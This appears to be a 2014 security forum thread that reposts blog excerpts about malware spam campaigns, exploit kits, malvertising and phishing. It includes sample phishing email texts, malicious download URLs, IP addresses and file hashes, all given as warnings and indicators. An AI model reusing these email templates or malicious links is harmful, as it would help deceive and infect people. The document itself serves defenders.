* http://blog.malcovery.com/blog/dyre-banking-trojan-what-you-need-to-know
> https://www.brainyquote.com/quotes/quotes/b/benjaminfr122731.html
"Distrust and caution are the parents of security" - Ben Franklin
:mad: :fear::fear:
AplusWebMaster
2014-08-22, 15:49
FYI...
WordPress attacks exploiting XMLRPC
- http://myonlinesecurity.co.uk/ongoing-wordpress-attacks-exploiting-xmlrpc/
Aug 22, 2014 - "We are experiencing Ongoing WordPress attacks exploiting XMLRPC. There appears to be a massive attack on WordPress sites today. So far I have had almost -1600- blocked attacks against ONE of my WordPress sites... Anybody using WordPress should make sure that they are plugged and use a good security system to prevent or -block- these attacks. It appears to be using the attack mentioned in this post:
> http://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html
... -None- of the current wordpress security plugins will -block- this and you need to make sure that you have a strong random password on your admin account. The -only- way to block them is on the perimeter, that is use a firewall that blocks the offending IP numbers that are responsible for the attacks. They are all coming from other compromised servers or hacked users computers..."
(More detail at the URL's above.)
___
Fake ADP 'Anti-Fraud Secure Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/adp-august-22-2014-anti-fraud-secure-update-fake-pdf-malware/
22 Aug 2014 - "'ADP: August 22, 2014 Anti-Fraud Secure Update' pretending to come from ADP_Netsecure@ adp .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
The certificate will be attached to the computer of the account holder, which disables any fraud activity
Any irregular activity on your account is detected by our safety centre
Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have...
22 August 2014 : 2014 Anti-Fraud Secure Update_08222014.zip (9kb)
Extracts to 2014 Anti-Fraud Secure Update_08222014.exe
Current Virus total detections: 3/54* . This 'ADP: August 22, 2014 Anti-Fraud Secure Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/81e695f628436a4850bec46b3f90906433a0d11ae163f298f48fae788362d29a/analysis/1408710186/
- http://threattrack.tumblr.com/post/95457720908/adp-anti-fraud-update-spam
22 Aug 2014 - "Subjects Seen:
ADP: August 22, 2014 Anti-Fraud Secure Update
Typical e-mail details:
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0ce8b26a9ef99d5ebbb8f37a1f29e47d/tumblr_inline_napm4cGa8i1r6pupn.png
Malicious File Name and MD5:
2014 Anti-Fraud Secure Update_08222014.scr (840B3B6A714F7330706F0C19F99D5EB8)
2014 Anti-Fraud Secure Update_08222014.zip (AB0D93E0952BDCE45D6E6494DF4D94AD)
Tagged: ADP, Upatre
___
"FlashPack" - add-on targets Japanese users, leads To exploit kit
- http://blog.trendmicro.com/trendlabs-security-intelligence/website-add-on-targets-japanese-users-leads-to-exploit-kit/
Aug 21, 2014 - "... In order to affect users, this particular exploit kit does -not- rely on spammed messages or compromised websites: instead, it uses a compromised website add-on. This particular add-on is used by site owners who want to add social media sharing buttons on their sites. All the site owner would have to do is add several lines of JavaScript code to their site’s design template. This code is freely available from the website of the add-on. The added script adds an overlay like this to the site’s pages:
Added share buttons:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/toolbar.png
To do this, a JavaScript file on the home page of the add-on is loaded. This alone should raise red flags: it means that the site owner is loading scripts from an external server -not- under their control. It’s one thing if it loads scripts on trusted sites like Google, Facebook, or other well-known names; it’s another thing to load scripts on little-known servers with no name to protect. As it turns out, this script is being used for malicious purposes. On certain sites, instead of the original add-on script, the user is redirected to the script of FlashPack... loading the s.js file directly will simply load the “correct” script for the add-on. One site which, if found in the Referer header, will trigger the exploit kit is a well-known free blogging site in Japan. The exploit kit delivers various Flash -exploits- to -targeted- users... At least approximately 58,000 users have been affected by this attack, with more than 87% of these coming from Japan. The landing pages of the exploit kit are hosted in servers in the Czech Republic, the Netherlands, and Russia.
Number of hits by country from August 1 to 17
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/08/Number-of-Hits-by-Country-01.jpg
How can users and site owners prevent these attacks? Site owners should be very cautious about adding add-ons to their site that rely on externally hosted scripts. As shown in this attack, they are trivial to use in malicious activities. In addition, they can slow the site down as well. Alternatives that host the script on the same server as the site itself are preferable. This incident illustrates for end users the importance of keeping-software-patched. The vulnerability we mentioned above has been fixed for half-a-year. Various auto-update mechanisms exist which can keep Flash up-to-date..."
:fear::fear: :mad:
AplusWebMaster
2014-08-24, 13:17
FYI...
My Photos SPAM - malware
- http://myonlinesecurity.co.uk/photos-malware/
23 Aug 2014 - "'My Photos' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Very simple email with content just saying 'Please find attached photos of my birthday party.' This one is particularly nasty and dangerous because it doesn’t give any outward signs of infection. It downloads an auto-configure script from http ://construtoralondres.zip .net/JScript32.log which then attempts to send all traffic through a proxy server http ://supermercadorleves.ddns .net which then filters out UK banking traffic to another proxy where they can steal all your banking log on and account information. Each UK bank is sent to a -different- proxy where the sites are set up to intercept traffic to the genuine UK bank site. That way, you think that you are on the genuine UK bank site and you actually are, but the proxy between you and the bank can read -everything- you type or do on the bank site. You have absolutely no idea that this is happening & you still get a padlock in the address bar to say that you are on a safe site.
23 August 2014: My Photos.zip ( 8kb): Extracts to My Photos.exe
Current Virus total detections: 10/50* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/8ef000f729f060a55aabaae7f16dc0e4da1108cdb8fef189dbafaa5b220b5ff0/analysis/1408799346/
zip .net / 200.147.99.195: https://www.virustotal.com/en/ip-address/200.147.99.195/information/
- http://quttera.com/detailed_report/zip.net
Submission date: Aug 24 16:53:51 2014
Server IP address: 200.147.99.195
"Warning: This Website Is Blacklisted!..."
ddns .net / 8.23.224.108: https://www.virustotal.com/en/ip-address/8.23.224.108/information/
- http://quttera.com/detailed_report/ddns.net
Submission date: Aug 24 16:46:40 2014
Server IP address: 8.23.224.108
"Alert: Suspicious Content Detected On This Website!..."
___
Sony PlayStation Network taken down by attack
- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 24, 2014 - "Sony Corp said on Sunday its PlayStation Network was taken down by a denial of service-style attack and the FBI was investigating the diversion of a flight carrying a top Sony executive amid reports of a claim that explosives were on board. The company said in a posting on its PlayStation blog that no personal information of the network was accessed in the attack, which overwhelmed the system with heavy traffic..."
- http://www.reuters.com/article/2014/08/25/us-sony-network-idUSKBN0GP02620140825
Aug 25, 2014 - "Sony Corp's PlayStation Network was back online on Monday following a cyber attack that took it down over the weekend, which coincided with a bomb scare on a commercial flight carrying a top Sony executive in the United States. Sony said on its PlayStation blog that its PlayStation network had been taken down by a denial of service-style attack, which overwhelmed the system with traffic, but did not intrude onto the network or access any of its 53 million users' information..."
:mad: :fear: :sad:
AplusWebMaster
2014-08-25, 14:51
FYI...
Fake Invoice SPAM - PDF Malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-fake-pdf-malware/
25 Aug 2014 - "'Please find attached Invoice No.' < random number> pretending to come from portadown.372@eel .co.uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails are -not- being sent from eel .co.uk or edmundson-electrical .co.uk, As far as we can determine they have not been hacked or their website or email system compromised. The bad guys have just decided to use Edmundson Electrical Ltd as a way to persuade you to open the attachment and become infected. It is a follow on campaign from this Broadoak toiletries attack:
> http://myonlinesecurity.co.uk/invoice-951266-fake-pdf-malware/
Once again this email template has several different sized malwares attached to it and it appears random which version you get... Email looks like:
WALSALL
MAHON RD IND EST. PORTADOWN
CO. ARMAGH BT62 3EH
T:028 3833 5316
F:028 3833 8453
Please find attached Invoice No. 3036 – 8340637
Best
Branch Manager
Registered Office: PO Box 1 Knutsford Cheshire WA16 6AY ...
25 August 2014: 3036 – 8340637.zip (44kb): Extracts to Invoice 372 – 667911.exe
Current Virus total detections: 2/55*
25 August 2014: 0463 – 485325.zip (47kb): Extracts to Invoice 829 – 991882.exe
Current Virus total detections: 2/51**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9b4e4ffb3943a08bc1c7b7bc7548aa5ce6e53375514081caf8d8973eadf5c87/analysis/1408955315/
** https://www.virustotal.com/en/file/cbd0a0fe8caa5e02e05ae196b89d3d1d1f6f680b00403add549b12356e2d8013/analysis/1408955404/
___
Fake Fax SPAM - pdf malware
- http://myonlinesecurity.co.uk/fax-arrived-remote-id-866-905-0884-fake-pdf-malware/
25 Aug 2014 - "'A fax has arrived from remote ID ’866-905-0884' pretnding to come from RFaxSMTP MTGm <RIGHTFAX@ mtgmfaxmail .bankofamerica .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
A fax has arrived from remote ID ’866-905-0884′.
————————————————————
Transmission Record
Received from remote ID: ’866-905-0884′
Inbound user ID derek, routing code 669164574
Result: (0/352;0/0) Successful Send
Page record: 1 – 2
Elapsed time: 00:39 on channel 34 ...
25 August 2014: Fax_Remote_ID.zip ( 13kb) : Extracts to Fax_Remote_ID.scr
Current Virus total detections: 0/55* . This 'A fax has arrived from remote ID 866-905-0884' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37bbf261819afd6fabb75cb8815d4651e09329ab5cb8fe0b01d376096f195ab6/analysis/1408971894/
___
Bank of America Activity Alert Spam
- http://threattrack.tumblr.com/post/95740068388/bank-of-america-activity-alert-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Alert: A Check Exceeded Your Requested Alert Limit
Typical e-mail details:
Activity Alert
A check exceeded your requested alert limit
We’re letting you know a check written from your account went over the limit you set for this alert.
For more details please check attached file
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4bf4d24ed5d86a6ec8c689e611edac36/tumblr_inline_navd12Tu861r6pupn.png
Malicious File Name and MD5:
report08252014_6897454147412.vcr (7ED898AA2A8B247F7C7A46D71B125EA8)
report08252014_6897454147412.zip (FF4C74D80D3C7125962D7316F570A7FF)
Tagged: Bank of America, Upatre
___
Facebook Work From Home SCAM
- http://www.hoax-slayer.com/facebook-work-from-home-program-scam.shtml
Aug 25, 2014 - "Message claims that Facebook has launched a new 'Work From Home' program that will allow users to make money from the comfort of their own homes... The message is a scam. Facebook has not launched such a program and has no connection to the scheme. The link in the message takes you to a fake Facebook Page that tries to trick you into paying four dollars for a dodgy 'Facebook Millionaire' kit. Fine print on the signup form indicates that your credit card will be charged $94 per month for continued access. Do -not- be tempted to participate in this -bogus- program.
> http://www.hoax-slayer.com/images/facebook-work-from-home-program-scam-1.jpg
... It claims that people can potentially make thousands of dollars per month but warns that only a limited number of 'positions' are available... If this message comes your way, do -not- click any links it contains..."
___
Fake ADP SPAM - PDF malware
- http://myonlinesecurity.co.uk/adp-invoice-week-ending-08222014-invoice-447589545-fake-pdf-malware/
25 Aug 2014 - "'ADP Invoice for week ending 08/22/2014 Invoice: 447589545' pretending to come from Billing.Address.Updates@ ADP .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Your most recent ADP invoice is attached for your review. If you have any questions regarding this invoice, please contact your ADP service team at the number or e-mail address provided on the invoice for assistance.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It is generated from an unattended mailbox.
25 August 2014: invoice_447589545.zip (10kb): Extracts top invoice_447589545.exe
Current Virus total detections: 2/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/511aae72f63fd0256b7210d8a20afc75df7d1225ac054ec732a7fee43d11657b/analysis/1408992097/
___
BoA Merrill Lynch CashPro Spam
- http://threattrack.tumblr.com/post/95756978548/bank-of-america-merrill-lynch-cashpro-spam
Aug 25, 2014 - "Subjects Seen:
Bank of America Merrill Lynch: Completion of request for ACH CashPro
Typical e-mail details:
You have received a secure message from Bank of America Merrill Lynch
Read your secure message by opening the attachment, securedoc.html. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it in a Web browser.
If you have concerns about the validity of this message, contact the sender directly.
First time users - will need to register after opening the attachment.
Malicious URLs:
161.58.101.183/handler/jxpiinstall.exe
Malicious File Name and MD5:
securedoc.html (D6E1DD6973F8FAA730941A19770C97F2)
jxpiinstall.exe (C3110BFDD8536DC627336D7F7A6CC2E7)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f63cc48713e65cd81bd3d292795f917a/tumblr_inline_navorjRagN1r6pupn.png
Tagged: Bank of America, Merrill Lynch, tuscas
161.58.101.183: https://www.virustotal.com/en/ip-address/161.58.101.183/information/
:mad: :fear: :sad:
AplusWebMaster
2014-08-26, 12:21
FYI...
Fake Vodafone SPAM
- http://blog.dynamoo.com/2014/08/vodafone-mms-service-malware-spam.html
26 Aug 2014 - "This -fake- Vodafone spam comes with a malicious attachment. There is not body text as such, the header reads:
From: Vodafone MMS service [mms813562@ vodafone .co.uk]
Date: 26 August 2014 12:00
Subject: IMG Id 813562-PictQbmR TYPE--MMS
The version I had was mangled and the attachment was just called noname which required a bit of work to turn into a ZIP file IMG Id 813562-PicYbgRr TYPE--MMS.zip which in turn contains a malicious executable Picture Id 550125-PicSfdce TYPE-MMS.exe This .EXE file has a VirusTotal detection rate of 3/55*. The malware then attempts to download additional components... This second component has a VirusTotal detection rate of 3/53**... I would recommend the following blocklist:
192.254.186.106 ..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/fe088d41e44b4c63ea6c4ed572f4537dc19265bddc56a567b61587b35819511d/analysis/1409051519/
** https://www.virustotal.com/en-gb/file/8aa74dba2e258b6965c8e3e68480ac5912f52fd85dc6c96839cce0c23123e776/analysis/1409052175/
192.254.186.106: https://www.virustotal.com/en/ip-address/192.254.186.106/information/
___
Phishers hook Facebook Users via SMS
- https://blog.malwarebytes.org/fraud-scam/2014/08/phishers-hook-facebook-users-via-sms/
Aug 26, 2014 - "If you happen to receive an SMS message from a potentially unknown recipient with the following text—
wtf f***** remove this pic from Facebook. http ://bit[dot]do/fbnudephotos
... much like the fellow on the screenshot:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/SMS.png
...then you’ve been targeted by a phishing campaign. The bit .do link is the shortened URL for a publicly available HTML page hosted on a Dropbox account. It looks like this:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/dbox-phish.png
All links but one – the 'Get Facebook for iPhone and browse faster' link – lead to a 404 page. The aforementioned link leads to the actual iTunes app download page. The full code of the page is actually hex encoded and executed by the unescape () function... Once users provide their Facebook credentials to the page, these are then posted to a .PHP page hosted on 193[dot]107[dot]17[dot]68, which we found out to be quite a popular location for hosting malware. While this happens at the background, users are directed to the following screenshot which serves as humour, if not a “Gotcha!” after a successful con:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/unibrow.png
... Individuals or groups with bad intent have been using SMS as a way to -scam- people, either for their money or for their information. Senior Security Researcher Jérôme Segura have published a post entitled “SMS Scams: How To Defend Yourself”* back in 2013, which I recommend you... read as well. His thoughts on this kind of fraud remains relevant to this date..."
* https://blog.malwarebytes.org/intelligence/2013/07/sms-scams-how-to-defend-yourself/
193.107.17.68: https://www.virustotal.com/en/ip-address/193.107.17.68/information/
___
Vacation SCAMS ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/leave-these-vacation-scams-at-the-border/
Aug 26, 2014 - "... common travel scams and things to be wary of right now... First up, we have an Infographic over at the Just the flight blog which details 40 tourist scams to avoid*, along with common locations for said scams:
* http://www.justtheflight.co.uk/blog/16-40-tourist-scams-to-avoid-this-summer.html
... Whether you’re being driven to fake hotels by taxi drivers in on the act, looking at bogus takeaway menus slipped under your hotel door, accosted by pretend policemen or trying to catch a fake baby (no really) thrown in your general direction by a scammer working with pickpockets... Next up, we have some advice on the South China Morning Post in relation to travelling alone**, which includes tips and advice alongside links to additional information. Well worth a look if you’re planning on upping sticks and going solo:
** http://www.scmp.com/magazines/48hrs/article/1574227/roam-alone-tips-single-traveller
Finally, there’s a device which can be placed inside jewelry and perform numerous functions while on the move, including sending alert messages*** in case of emergency:
*** http://www.bust.com/this-stylish-jewelry-could-keep-you-safe.html
Wherever you go, you can be sure con-jobs and fakeouts lie in wait and the sensible traveler will do a little background reading before wandering off to parts unknown. It pays to keep your wits about you whether at home or abroad..."
(More at the malwarebytes URL at the top.)
___
SourceForge sub-domain redirects to Flash-Pack-Exploit-Kit
- https://blog.malwarebytes.org/exploits-2/2014/08/sub-domain-on-sourceforge-redirects-to-flash-pack-exploit-kit/
Aug 25, 2014 - "We have talked about SourceForge before on this blog, in particular when they were associated with -bundled- software... take a look at an infected sub-domain hosted on SourceForge responsible for a drive-by download attack... This calls to stat-count .dnsdynamic .com a domain previously identified* as a source of malicious activity. This one is no different...
* https://www.virustotal.com/en/domain/stat-count.dnsdynamic.com/information/
... You may recognize the URL landing for the Flash Pack Exploit Kit. There is an interesting series of -redirections- ... The last URL is a Flash file, VT detection here:
> https://www.virustotal.com/en/file/6082e26c223171124388ba2cf01e65840ef997863f42e418998d97e4fbcd6803/analysis/1408996053/
... A Flash file with a peculiar name for its classes:
> https://www.virustotal.com/en/file/3fc9204595ccfacae5624653d96b95e60d25609f560e543054525ca2e56cb0b6/analysis/1408979154/
The payload (VT results**) is detected by Malwarebytes Anti-Malware as Trojan.Agent.ED... We have spotted similar redirections to the Flash Pack exploit kit in other popular sites as well. Whether is it part of a larger campaign is hard to say but it is particularly active at the moment. Drive-by download attacks are the number -one- vector for malware infections. Legitimate websites often fall victim to malicious -injections- stealing incoming traffic and sending it to booby-trapped pages. Within seconds, an unpatched computer could get infected with a nasty piece of malware..."
(More detail at the malwarebytes URL at the top.)
** https://www.virustotal.com/en/file/5df51346ec3d96e781650488caaad85e64afbd2c45ca6228f7c6eddeb70de464/analysis/1408996125/
dnsdynamic .com - 84.45.76.100: https://www.virustotal.com/en/ip-address/84.45.76.100/information/
:fear::fear: :mad:
AplusWebMaster
2014-08-27, 13:41
FYI...
Fake Invoice SPAM - malicious attachment ...
- http://blog.dynamoo.com/2014/08/morupule-coal-mine-malware-spam.html
27 Aug 2014 - "This -fake- invoice spam claims to be from a (real) coal mine in Botswana. But in fact the PDF file attached to the message is malicious.
From: Madikwe, Gladness [GMadikwe@mcm.co.uk]
Date: 27 August 2014 10:43
Subject: Tax Invoice for Delivery Note 11155 dated 22.08.14
Hello ,
Please find attached the invoice for delivery note 11155 which was created on the 22 . 08. 14 after a system error to process this tax invoice.
Thank you
Regards
Gladness B Madikwe
Sales & Marketing Clerk
Morupule Coal Mine ...
Screenshot: http://1.bp.blogspot.com/-1wXuSVrxknQ/U_2vj2r9FGI/AAAAAAAAFVs/qn_Ls8u3nTM/s1600/moropule.png
Neither the Morupule Coal Mine nor the Debswana Diamond Company mentioned in the disclaimer are anything to do with this spam email, in fact it originates from a -hacked- machine in India. The attachment has a VirusTotal detection rate of 5/54*. My PDF.. isn't good enough to tell you what this malware actually does, but you can definitely guarantee that it is malicious."
* https://www.virustotal.com/en-gb/file/b1b121a0ef68b7abf628b4bdf10d583e6996c35a1888779e78d75c2907aebdf7/analysis/1409133512/
___
Malvertising: Not all Java from java .com is legit
- http://blog.fox-it.com/2014/08/27/malvertising-not-all-java-from-java-com-is-legitimate/
Aug 27, 2014 - "... getting a Java exploit via java .com, the primary source for one of the most common used browser plugins? Current malvertising campaigns are able to do this... real-time advertisement bidding platforms being infiltrated by cyber criminals spreading malware... Malvertising has changed over the years starting with exploitation of weak advertisement management panels... evolved into pretending to be a legit third party advertiser with social engineering. The current malvertising techniques are quite deceptive and most of the times only noticeable at the client side... It can be a malicious advertiser 3 layers down in the chain but it can also be on the 1st level... observed multiple high-profile websites -redirecting- their visitors to malware... These websites have not been compromised themselves, but are the victim of malvertising. This means an advertisement provider, providing its services to a small part of a website, serves malicious advertisement aimed at infecting visitors with malware. While monitoring network traffic to and from workstations we observed a higher than usual amount of infections. When investigating these incidents in depth we noticed that they were infected with advertisements served via high-profile websites... the following websites were observed redirecting and/or serving malicious advertisements to their visitors:
Java .com
Deviantart .com
TMZ .com
Photobucket .com
IBTimes .com
eBay .ie
Kapaza .be
TVgids .nl
The advertisement in this case included the Angler exploit kit. Upon landing on this exploit kit a few checks were done to confirm whether the user is running a vulnerable version of either Java, Flash or Silverlight. If the user was deemed vulnerable the exploit kit would embed an exploit initiating a download of a malicious payload, in this campaign it was the Asprox malware. This whole process of malvertising towards an exploit kit is also visualized in the image at the top of this post. Please note, a visitor does -not- need to -click- on the malicious advertisements in order to get infected. This all happens silently in the background as the ad is loaded by the user’s browser... ... 3 IP’s having been associated with these domains:
198.27.88.157: https://www.virustotal.com/en/ip-address/198.27.88.157/information/
94.23.252.38: https://www.virustotal.com/en/ip-address/94.23.252.38/information/
178.32.21.248: https://www.virustotal.com/en/ip-address/178.32.21.248/information/
There is no silver bullet to protect yourself from malvertising. At a minimum:
- Enable click-to-play in your browser. This prevents 3rd party plugins from executing automatically.
- Keep all plugins running in the browser up-to-date using tools like Secunia PSI.
- Consider turning off unneeded plugins if you don’t use them. For example, Java can be installed without the web-plugin component lowering the risk of exploitation and infection..."
(More detail at the fox-it URL above.)
___
"Customer Statements" - malware SPAM
- http://blog.dynamoo.com/2014/08/customer-statements-malware-spam.html
27 Aug 2014 - "This brief spam has a malicious PDF attachment:
Fom: Accounts [hiqfrancistown910@ gmail .com]
Date: 27 August 2014 09:51
Subject: Customer Statements
Good morning,attached is your statement.
My regards.
W ELIAS
Attached is a file Customer Statements.PDF which has a VirusTotal detection rate of 6/55*. Analysis is pending."
* https://www.virustotal.com/en-gb/file/d4701c59264760f0d9a4e47cb9d7db9cb76445bf4f042c1d845ab5191f1cd689/analysis/1409135030/
___
Royal Bank of Canada Payment Spam
- http://threattrack.tumblr.com/post/95908793833/royal-bank-of-canada-payment-spam
Aug 27, 2014 - "Subjects Seen:
The Bank INTERAC to Leo Dooley was accepted.
Typical e-mail details:
The INTERAC Bank payment $19063.01 (CAD) that you sent to Leo Dooley, was accepted.
The transfer is now complete.
Message recipient: The rating was not provided.
See details in the attached report.
Thank you for using the Service INTERAC Bank RBC Royal Bank.
Malicious File Name and MD5:
INTERAC_PAYMENT_08262014.exe (B064F8DA86DB1C091E623781AB464D8A)
INTERAC_PAYMENT_08262014.zip (71239A9D9D25105CEC3DF269F1FDCA2D
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/fb4a2ec18d4a89785009fc1879506a92/tumblr_inline_nayu2cOUqn1r6pupn.png
Tagged: RBC, Upatre
___
AT&T DocuSign Spam
- http://threattrack.tumblr.com/post/95918175803/at-t-docusign-spam
Aug 27, 2014 - "Subjects Seen:
Please DocuSign this document: Contract_changes_08_27_2014 .pdf
Typical e-mail details:
Hello,
AT&T Contract Changes has sent you a new DocuSign document to view and sign. Please click on the ‘View Documents’ link below to begin signing.
Malicious URLs:
79.172.51.73/Docusign/wps/myportal/sitemap/Member/ATT/SignDocument/7c16d8c7-e5ad-4870-bb79-1c1e4c9b35d6&er=fb88d3b6-88f4-4903-ae77-41754063bd7c/Contract_changes_08_27_2014.zip
Malicious File Name and MD5:
Contract_changes_08_27_2014.zip (5ED69A412ADB215A1DABB44E88C8C24D)
Contract_changes_08_27_2014.exe (C65966CCA8183269FF1120B17401E693)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2be088fa857d593c69b6a9644b1fec46/tumblr_inline_naz25ifIWp1r6pupn.png
79.172.51.73: https://www.virustotal.com/en-gb/ip-address/79.172.51.73/information/
Tagged: ATT, DocuSigin, Upatre
- http://myonlinesecurity.co.uk/please-docusign-document-contract_changes_08_27_2014-pdf-fake-pdf-malware/
27 Aug 2014
___
ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/95917541998/adp-past-due-invoice-spam
Aug 27, 2014 - "Subjects Seen:
ADP Past Due Invoice
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here...
Malicious URLs:
81.80.82.27/upload/portal.adp.com/wps/myportal/sitemap/PayTax/PayStatements/invoice_449017368.zip
Malicious File Name and MD5:
invoice_449017368.zip (CF55AD09F9552A80CD1534BD392B44D1)
invoice_449017368.exe (C65966CCA8183269FF1120B17401E693)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/595fe50ab5e77ca2c29866eed0475ea8/tumblr_inline_naz1pmSD3h1r6pupn.png
81.80.82.27: https://www.virustotal.com/en-gb/ip-address/81.80.82.27/information/
Tagged: ADP, Upatre
___
Fake Payment Advice SPAM - PDF malware
- http://myonlinesecurity.co.uk/payment-advice-note-27-08-2014-fake-pdf-malware/
27 Aug 2014 - "'Payment Advice Note from 27.08.2014' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Disclaimer:
This e-mail is intended solely for the use of the individual to whom it is addressed. Any views or opinions presented are solely those of the author and do not represent those of AL-KO KOBER Limited. It may also contain information, which may be privileged and confidential and subject to legal privilege. If you are not the intended recipient, you may not peruse, use, disseminate, distribute or copy this message. If you have received this message in error, please notify the sender immediately by email, facsimile or telephone and return or destroy the original message.
AL-KO KOBER Limited is Registered in England at Companies Registration Office Cardiff with Company number: 492005. AL-KO KOBER Limited, South Warwickshire Business Park, Kineton Road, Southam, Warwickshire, CV47 0AL.
Cell 270 547-9194
27 August 2014: Payment_Advice_Note_27.08.2014.PDF.zip (48 kb)
Extracts to Payment_Advice_Note_27.08.2014.PDF.scr
Current Virus total detections: 0/55* . This Payment Advice Note from 27.08.2014 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2423cecc3c6a33db524d3d067103f9685576c8d1317d7d279917de986057f9ba/analysis/1409154303/
:fear: :mad:
AplusWebMaster
2014-08-29, 03:09
FYI...
The ‘Unknown’ Exploit Kit ...
- https://blog.malwarebytes.org/exploits-2/2014/08/shining-some-light-on-the-unknown-exploit-kit/
Aug 28, 2014 - "... Unless you have tracked the drive-by / exploit kit scene from day one or been able to map it out down to the tiniest details, this is not something easy... A couple of weeks ago, we observed a new traffic pattern (new to us) that first caught our attention for a couple of reasons:
- The payload’s size did not match that of any URL from the capture
- The URL patterns were new
... This exploit kit targets two different pieces of software: Microsoft Silverlight and Adobe Flash. However, unlike some other exploit kits it will only push one exploit per load giving preference to Silverlight first and then Flash.
Attack paths:
Silverlight only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_only.png
Flash only:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Flash_only.png
Silverlight and Flash:
> https://blog.malwarebytes.org/wp-content/uploads/2014/08/Silverlight_and_Flash.png
All three successful paths lead to either a:
- Silverlight exploit
- Flash exploit
... Conclusions:
The payload appears to be a -browser- hijack whose goal is to illegally gain advertising revenue from infected computers. What is perhaps more puzzling is the fact that this exploit kit has been around for so long and yet has been so quiet, not to mention the fact that reproducing an infection even with the proper referers is rather difficult (IP blacklisting, geolocation, etc). Another big question remains: Why would the author(s) bother with such advanced fingerprinting and evasion techniques, something we don’t normally see in typical malware... this bit of research has brought up more questions than when we started. That is not unusual though, and at least some dots have been connected."
(More detail at the malwarebytes URL at the top.)
:fear::fear:
AplusWebMaster
2014-08-29, 13:39
FYI...
Fake 'new photo' SPAM - malware
- http://myonlinesecurity.co.uk/new-photo-malware/
29 Aug 2014 - "'my new photo' pretending to come from Yulia <random name@ madmimi .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These all have the same subject of 'my new photo' and come from somebody called 'yulia' and today all pretend to come from same domain madmimi .com... Email reads:
my new photo ..
if you like my photo to send me u photo
29 August 2014: photo.zip ( 23kb): Extracts to photo.exe
Current Virus total detections: 2/55* ... more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustotal.com/en/file/e4c328815cc2840b53514e7bdcc43c83b29c0ae4676c755b4ee9587aa8c37db9/analysis/1409297373/
___
Netflix PHISH ...
- https://blog.malwarebytes.org/fraud-scam/2014/08/fraudulent-netflix-site-wants-to-leave-you-high-and-dry/
